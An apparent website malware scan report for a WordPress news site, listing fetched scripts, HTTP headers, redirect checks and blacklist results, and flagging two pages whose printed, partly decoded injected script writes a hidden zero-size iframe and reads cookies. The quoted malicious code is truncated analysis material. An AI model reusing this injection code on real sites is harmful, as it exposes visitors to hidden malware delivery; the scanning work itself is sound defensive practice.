Scanned pages/files
Request | Server response | Status |
http://cendikianews.com/ | 200 OK Content-Length: 204248 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var a="'1Aqapkrv'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00tl6,'00'02)'02'00p,vg'00' ...[588 bytes skipped]... Decoded script: ...[3282 bytes skipped]... enablefrequency:0, displayfrequency:"1 days", defineheader:"", cookiename:["coolsescookie", "path=/"], autohidetimer:0, launch:false, browserdetectstr:(window.opera && window.getSelection) || (!window.opera && window.XMLHttpRequest), output:function () { document.write('<div id="content_ses_page" style="position: absolute; z-index: -1; color: white; background-color:white">'); document.write('<iframe name="splashpage-iframe" src="about:blank" style="margin:0; padding:0; width:0%; height: 0%"></iframe>'); document.write("<br /> </div>"); this.splashpageref = document.getElementById("content_ses_page"); this.splashiframeref = window.frames["splashpage-iframe"]; //--- var parsed_domain = parseURL(window.location.origin); var cookie = parsed_domain.domain; var data = getCookie(cookie); var url = this.splas ...[3092 bytes skipped]... | ||
http://cendikianews.com/wp-includes/js/jquery/jquery.js?ver=1.11.2 | 200 OK Content-Length: 95952 Content-Type: application/javascript | clean |
http://cendikianews.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://cendikianews.com/wp-content/plugins/anthemes-reviews/js/tie.js?ver=4.2.4 | 200 OK Content-Length: 2278 Content-Type: application/javascript | clean |
http://cendikianews.com/wp-content/plugins/daves-wordpress-live-search/js/daves-wordpress-live-search.min.js?ver=4.2.4 | 200 OK Content-Length: 5016 Content-Type: application/javascript | clean |
http://cendikianews.com/wp-content/plugins/daves-wordpress-live-search/js/excanvas.compiled.js?ver=4.2.4 | 200 OK Content-Length: 11363 Content-Type: application/javascript | clean |
http://cendikianews.com/wp-content/plugins/daves-wordpress-live-search/js/spinners.min.js?ver=4.2.4 | 200 OK Content-Length: 8012 Content-Type: application/javascript | clean |
http://cendikianews.com/wp-content/plugins/social-share-button/js/ssb-scripts.js?ver=4.2.4 | 200 OK Content-Length: 2080 Content-Type: application/javascript | clean |
http://cendikianews.com/wp-content/plugins/social-share-button/js/jquery.tablednd.js?ver=4.2.4 | 200 OK Content-Length: 16664 Content-Type: application/javascript | clean |
http://cendikianews.com/wp-content/plugins/social-share-button/ParaAdmin/js/ParaAdmin.js?ver=4.2.4 | 200 OK Content-Length: 383 Content-Type: application/javascript | clean |
http://cendikianews.com/wp-content/plugins/thumbs-rating/js/general.js?ver=4.0.1 | 200 OK Content-Length: 1603 Content-Type: application/javascript | clean |
http://cendikianews.com//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 29 Aug 2015 10:15:49 GMT Pragma: no-cache Location: http://cendikianews.com/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: PHPSESSID=5afkkhj73a2vos5s5ecf2n9v24; path=/ X-Pingback: http://cendikianews.com/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://cendikianews.com/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 404 Not Found Content-Length: 158043 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var a="'1Aqapkrv'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00tl6,'00'02)'02'00p,vg'00' ...[588 bytes skipped]... Decoded script: ...[3282 bytes skipped]... enablefrequency:0, displayfrequency:"1 days", defineheader:"", cookiename:["coolsescookie", "path=/"], autohidetimer:0, launch:false, browserdetectstr:(window.opera && window.getSelection) || (!window.opera && window.XMLHttpRequest), output:function () { document.write('<div id="content_ses_page" style="position: absolute; z-index: -1; color: white; background-color:white">'); document.write('<iframe name="splashpage-iframe" src="about:blank" style="margin:0; padding:0; width:0%; height: 0%"></iframe>'); document.write("<br /> </div>"); this.splashpageref = document.getElementById("content_ses_page"); this.splashiframeref = window.frames["splashpage-iframe"]; //--- var parsed_domain = parseURL(window.location.origin); var cookie = parsed_domain.domain; var data = getCookie(cookie); var url = this.splas ...[3092 bytes skipped]... | ||
http://cendikianews.com/wp-includes/js/underscore.min.js?ver=1.6.0 | 200 OK Content-Length: 14643 Content-Type: application/javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201535 | 200 OK Content-Length: 9885 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2015Augaa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cendikianews.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 29 Aug 2015 10:15:40 GMT
Pragma: no-cache
Server: Apache
Content-Length: 204248
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://wp.me/6lEsX>; rel=shortlink
Set-Cookie: PHPSESSID=n7ik2tp4lfn8pj3h6f6nomrvr2; path=/
X-Pingback: http://cendikianews.com/xmlrpc.php
X-Powered-By: PHP/5.3.29
...204248 bytes of data.
GET / HTTP/1.1
Host: cendikianews.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 29 Aug 2015 10:15:40 GMT
Pragma: no-cache
Server: Apache
Content-Length: 204248
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://wp.me/6lEsX>; rel=shortlink
Set-Cookie: PHPSESSID=n7ik2tp4lfn8pj3h6f6nomrvr2; path=/
X-Pingback: http://cendikianews.com/xmlrpc.php
X-Powered-By: PHP/5.3.29
...204248 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cendikianews.com
Referer: http://www.google.com/search?q=cendikianews.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cendikianews.com
Referer: http://www.google.com/search?q=cendikianews.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cendikianews.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cendikianews.com/
Result: cendikianews.com is not infected or malware details are not published yet.
Result: cendikianews.com is not infected or malware details are not published yet.